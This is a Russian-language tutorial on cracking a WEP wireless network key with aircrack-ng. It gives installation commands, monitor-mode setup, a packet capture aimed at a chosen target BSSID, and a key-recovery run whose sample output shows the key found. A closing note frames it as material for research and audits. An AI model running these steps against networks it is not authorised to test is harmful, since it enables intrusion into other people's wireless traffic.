🖧 Как взломать ключ WEP безпроводной сети с помощью AIRCrack

Мануал

В этой статье кратко описаны простые шаги по взлому беспроводного WEP-ключа с помощью программы aircrack-ng.

Это можно сделать путем прослушивания беспроводной сети, перехвата зашифрованных пакетов и запуска соответствующей программы для взлома шифрования в попытке расшифровать перехваченные данные.

WEP (Wired Equivalent Privacy) довольно легко взломать, поскольку он использует только один ключ для шифрования всего трафика.

Основной принцип заключается в том, что связь между двумя хостами в сети основана на MAC-адресе.

Каждый узел получает пакеты, предназначенные только для MAC-адреса его собственного интерфейса.

Этот же принцип применим и к беспроводным сетям.

Однако если один хост переведет свою сетевую карту в режим promiscuous, он также будет получать пакеты, не предназначенные для его собственного MAC-адреса.

🖧 Безопасность беспроводной сети Wi-fi

Чтобы взломать ключ WEP, хакеру необходимо перехватить образцы пакетов, не предназначенных для его собственного сетевого интерфейса, и запустить программу взлома для сравнения ключей тестирования с ключом WEP, связанным с захваченными пакетами в попытке расшифровки. Ключ, который подходит для расшифровки захваченных пакетов, является ключом, используемым беспроводной сетью для шифрования всей беспроводной связи с подключенными машины.

В следующих разделах мы покажем вам установку aircrack-ng в Linux, а затем покажем вам пошаговые инструкции по взлому беспроводного WEP-ключа.

🔥 Как перехватить трафик в коммутируемой среде?

Руководство предполагает, что у вас установлена беспроводная сетевая карта и что она поддерживает режим monitor.

Установка aircrack-ng на основные дистрибутивы Linux

Чтобы начать работу, вам потребуется установленная в вашей системе программа aircrack-ng.

Вы можете использовать показанную ниже команду, чтобы установить программу с помощью менеджера пакетов вашей системы.

Чтобы установить aircrack-ng на Ubuntu, Debian и Linux Mint:

$ sudo apt install aircrack-ng

Для установки aircrack-ng на CentOS, Fedora, AlmaLinux и Red Hat:

$ sudo dnf install aircrack-ng

Чтобы установить aircrack-ng на Arch Linux и Manjaro:

$ sudo pacman -S aircrack-ng

Взлом WEP-ключа беспроводной сети

Сначала нам нужно определить имя нашего беспроводного сетевого интерфейса.

Если ваша беспроводная сетевая карта установлена правильно, команда iwconfig покажет имя вашего беспроводного сетевого интерфейса:

$ iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

см. также:

Устаревшие сетевые команды Linux и их замены

Вывод показывает, что в нашем случае имя интерфейса – wlan0.

Далее включите режим мониторинга беспроводного интерфейса.

# airmon-ng start wlan0
Interface       Chipset         Driver
wlan0                   rtl8180 - [phy0]
      (monitor mode enabled on mon0)

В результате выполнения команды вы получите имя нового виртуального интерфейса. Как правило, это будет mon0.

Выгрузите результаты работы монитора в терминал:

# airodump-ng mon0

Вы можете увидеть таблицу с данными, относящимися к беспроводным сетям .

Вам нужна информация только о той сети, которую вы хотите взломать.

Найдите ее и запишите BSSID и канал, на котором она работает.

Далее вам нужно записать результаты сканирования в файл.

Этот лог понадобится Aircrack для проведения атаки брутфорса на сеть далее.

Чтобы получить захват, выполните ту же команду, что и раньше, но укажите BSSID, канал и местоположение лога:

# airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

Заполните фактическую информацию перед запуском команды и оставьте ее запущенной.

В качестве последнего шага мы взломаем WEP-ключ с помощью перехваченных пакетов и команды aircrack-ng

. Все перехваченные пакеты теперь хранятся в файле wep-crack-01.cap.

# aircrack-ng -z wep-crack-01.cap

Ваш вывод должен выглядеть примерно так:

Opening wep-crack-01.cap
Read 450 packets.

   #  BSSID              ESSID                     Encryption

   1  00:11:95:9F:FD:F4  linuxconfig.org           WEP (210 IVs)
   2  00:17:3F:65:2E:5A  belkin54g                 None (0.0.0.0)

Index number of target network ?

1
                               Aircrack-ng 1.0 rc1


               [00:00:13] Tested 485 keys (got 16690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)

                         KEY FOUND! [ 3F:F3:8E:6E:98 ]
        Decrypted correctly: 100%

Заключение

В этом руководстве мы рассмотрели, как установить aircrack-ng в Linux и использовать программу для взлома беспроводного WEP-ключа.

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

См. также:

 

 

Добавить комментарий